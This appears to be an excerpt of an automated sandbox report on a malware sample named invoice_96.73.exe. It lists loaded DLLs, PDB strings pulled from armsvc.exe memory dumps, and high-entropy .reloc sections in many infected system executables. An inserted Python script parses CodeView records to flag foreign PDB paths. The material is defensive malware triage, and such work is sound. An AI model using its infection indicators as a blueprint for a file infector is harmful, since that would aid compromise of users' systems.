      Source: C:\Windows\System32\wbengine.exe | Section loaded: fveapi.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: tbs.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: fvecerts.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: logoncli.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: cscapi.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5CF917A-0F75-4B29-A0A0-5348E501DA59}\InprocServer32
      Source: invoice_96.73.exe | Static file information: File size 1799680 > 1048576
      Source: invoice_96.73.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
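The debug data directory noted above is where a PE's CodeView record lives, and the "Binary string" rows that follow show why it matters for triage here: memory dumps of armsvc.exe contain PDB paths for msiexec, vssvc, FXSSVC, wbengine, the JDK tools and many other binaries that armsvc.exe has no reason to hold, which is what a file infector reading and rewriting other executables looks like from the inside. The following is an added example, not the sandbox's or the report's own code: it parses RSDS CodeView records (signature, 16-byte GUID, 4-byte age, NUL-terminated path) out of a raw dump, derives the symbol-server key from GUID and age, falls back to bare ".pdb" strings, and lists the PDB names that do not belong to the process's own image. The dump and the GUIDs in it are constructed; the paths mirror the ones the report lists.

```python
import ntpath
import re
import struct
import uuid

# CodeView "RSDS" record: signature, 16-byte GUID, 4-byte age, NUL-terminated PDB path
RSDS = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]{1,260}?)\x00", re.DOTALL)
# Fallback for PDB paths that survive in memory without their CodeView header
LOOSE_PDB = re.compile(rb"[\x21-\x7e]{1,260}\.pdb")


def pdb_records(blob):
    """PDB references in a memory dump or file: RSDS records first, then bare '.pdb' strings."""
    records, seen = [], set()
    for m in RSDS.finditer(blob):
        guid = uuid.UUID(bytes_le=m.group(1))
        age = struct.unpack("<I", m.group(2))[0]
        path = m.group(3).decode("ascii", "replace")
        seen.add(path)
        records.append({"path": path, "name": ntpath.basename(path).lower(),
                        "guid": str(guid), "age": age,
                        # symbol-server key: upper-case GUID hex followed by the age in hex
                        "symkey": guid.hex.upper() + format(age, "X")})
    for m in LOOSE_PDB.finditer(blob):
        path = m.group(0).decode("ascii", "replace")
        if any(path.endswith(s) for s in seen):
            continue  # already captured through its RSDS record
        seen.add(path)
        records.append({"path": path, "name": ntpath.basename(path).lower(),
                        "guid": None, "age": None, "symkey": None})
    return records


def foreign_pdbs(blob, image_name):
    """PDB names in the dump that do not match the owning process's image, e.g. msiexec.pdb
    inside armsvc.exe; a long list is evidence the process handles other executables' contents."""
    own = ntpath.splitext(image_name)[0].lower()
    return sorted({r["name"] for r in pdb_records(blob)
                   if ntpath.splitext(r["name"])[0] != own})


def rsds(guid, age, path):
    """Build a CodeView RSDS record (used only to construct the sample dump below)."""
    return b"RSDS" + uuid.UUID(guid).bytes_le + struct.pack("<I", age) + path.encode() + b"\x00"


# Constructed dump standing in for an armsvc.exe memory region; GUIDs are made up.
SAMPLE_DUMP = (
    b"\x00" * 32
    + rsds("12345678-1234-5678-9abc-123456789abc", 1,
           r"D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb")
    + b"\x90" * 64
    + rsds("0a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9", 3, "msiexec.pdb")
    + b"\x00" * 16
    + b"vssvc.pdb\x00"    # a path fragment with no CodeView header around it
    + b"\x00" * 16
)

if __name__ == "__main__":
    for r in pdb_records(SAMPLE_DUMP):
        print(r["name"], r["guid"], r["age"], r["symkey"])
    print("foreign:", foreign_pdbs(SAMPLE_DUMP, "armsvc.exe"))
```

Run against a real dump, the symkey lets you pull the matching PDB from a symbol server to confirm which build of a system binary the process was holding, and a benign process that does not patch or install other software should report an empty foreign list.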
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: invoice_96.73.exe, 00000000.00000003.346461774.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
      Source: Binary string: TextExtractor.pdb55. source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdb source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 00000002.00000003.469269296.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.470738958.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, ktab.exe.2.dr
      Source: Binary string: AcroBroker.pdb source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 00000002.00000003.466271925.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.468672844.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vssvc.pdb source: armsvc.exe, 00000002.00000003.400446853.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.397705170.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: sppsvc.pdb source: armsvc.exe, 00000002.00000003.393285094.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\jp2launcher\obj64\jp2launcher.pdb source: armsvc.exe, 00000002.00000003.459702439.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb88/ source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: aspnet_state.pdb source: invoice_96.73.exe, 00000000.00000003.353700920.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdbTb source: armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: armsvc.exe, 00000002.00000003.453426244.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: invoice_96.73.exe, 00000000.00000003.350225262.0000000004220000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.353569093.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.382195696.0000000000710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.381468216.0000000000450000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\jre-image\bin\javaws.pdb source: armsvc.exe, 00000002.00000003.456767187.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 00000002.00000003.484334362.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.485863141.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, servertool.exe.2.dr
      Source: Binary string: FXSSVC.pdb source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Perforce\FRMain\code\build\win\results\Release\info\arh.pdb source: armsvc.exe, 00000002.00000003.539704237.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehSched.pdb source: armsvc.exe, 00000002.00000003.368828729.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: locator.pdb@SH source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: locator.pdb source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: Eula.pdb995 source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb''$ source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ALG.pdbH source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 00000002.00000003.457782973.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.459238005.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\javaw_objs\javaw.pdb source: armsvc.exe, 00000002.00000003.455163285.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdb source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 00000002.00000003.475333705.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.473148665.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, pack200.exe.2.dr
      Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb"" source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\ssvagent\obj64\ssvagent.pdb source: armsvc.exe, 00000002.00000003.486325519.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: Reader_SL.pdb source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
      Source: Binary string: dllhost.pdb source: armsvc.exe, 00000002.00000003.367049067.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.365429187.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.366371363.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.560950448.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 00000002.00000003.489549395.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.487933840.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 00000002.00000003.417582553.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.418441175.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 00000002.00000003.420532553.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 00000002.00000003.464557449.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.465983373.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\unpackexe\unpack200.pdb source: armsvc.exe, 00000002.00000003.490456860.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, unpack200.exe.2.dr
      Source: Binary string: chrome_wow_helper.pdb source: armsvc.exe, 00000002.00000003.573489148.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroBroker.pdbsTT6 source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 00000002.00000003.484025303.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.482732897.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000002.00000003.389231981.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390086664.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.389367971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb] source: DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 00000002.00000003.471060222.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.472762066.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdbH source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: ALG.pdb source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jabswitch\jabswitch.pdb source: armsvc.exe, 00000002.00000003.444147951.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb00 source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 00000002.00000003.461065533.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.464249013.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Eula.pdb source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 00000002.00000003.482423318.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.480866013.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 00000002.00000003.447269346.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.449170797.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, java-rmi.exe.2.dr
      Source: Binary string: mscorsvw.pdb source: armsvc.exe, 00000002.00000003.358919059.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357934504.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.360197624.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357840917.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.359130916.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Reader_SL.pdb..) source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
      Source: Binary string: E:\r\ws\St_Make\code\build\win\results\FlashPlayerUpdateService\Release\Win32\FlashPlayerUpdateService.pdb source: invoice_96.73.exe, 00000000.00000003.347332988.0000000002A90000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 00000002.00000003.480547768.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.476508666.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb;; source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.382555464.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java_objs\java.pdb source: armsvc.exe, 00000002.00000003.449717212.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, java.exe.2.dr
      Source: Binary string: TextExtractor.pdb source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehRecvr.pdb source: armsvc.exe, 00000002.00000003.367743186.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: armsvc.exe.0.dr Static PE information: section name: .didat
      Source: elevation_service.exe.2.dr Static PE information: section name: .00cfg
      Source: elevation_service.exe.2.dr Static PE information: section name: .gxfg
      Source: elevation_service.exe.2.dr Static PE information: section name: .retplne
      Source: elevation_service.exe.2.dr Static PE information: section name: .voltbl
      Source: elevation_service.exe.2.dr Static PE information: section name: _RDATA
      Source: invoice_96.73.exe Static PE information: section name: .reloc entropy: 7.876658513199357
      Source: AdobeCollabSync.exe.2.dr Static PE information: section name: .reloc entropy: 7.745437433816161
      Source: ehrecvr.exe.2.dr Static PE information: section name: .reloc entropy: 7.947759158164801
      Source: FXSSVC.exe.2.dr Static PE information: section name: .reloc entropy: 7.938155100469492
      Source: elevation_service.exe.2.dr Static PE information: section name: .reloc entropy: 7.9503349211039165
      Source: sppsvc.exe.2.dr Static PE information: section name: .reloc entropy: 7.942248601296767
      Source: VSSVC.exe.2.dr Static PE information: section name: .reloc entropy: 7.931247010308512
      Source: wbengine.exe.2.dr Static PE information: section name: .reloc entropy: 7.933039646823671
      Source: wmpnetwk.exe.2.dr Static PE information: section name: .reloc entropy: 7.923593696253763
      Source: SearchIndexer.exe.2.dr Static PE information: section name: .reloc entropy: 7.941858190492632
      Source: setup.exe.2.dr Static PE information: section name: .reloc entropy: 7.9408025581316295
      Source: CCleaner.exe.2.dr Static PE information: section name: .reloc entropy: 7.785488048281558
      Source: CCleaner64.exe.2.dr Static PE information: section name: .reloc entropy: 7.927956703420215
      Source: RdrCEF.exe.2.dr Static PE information: section name: .reloc entropy: 7.905381706036114
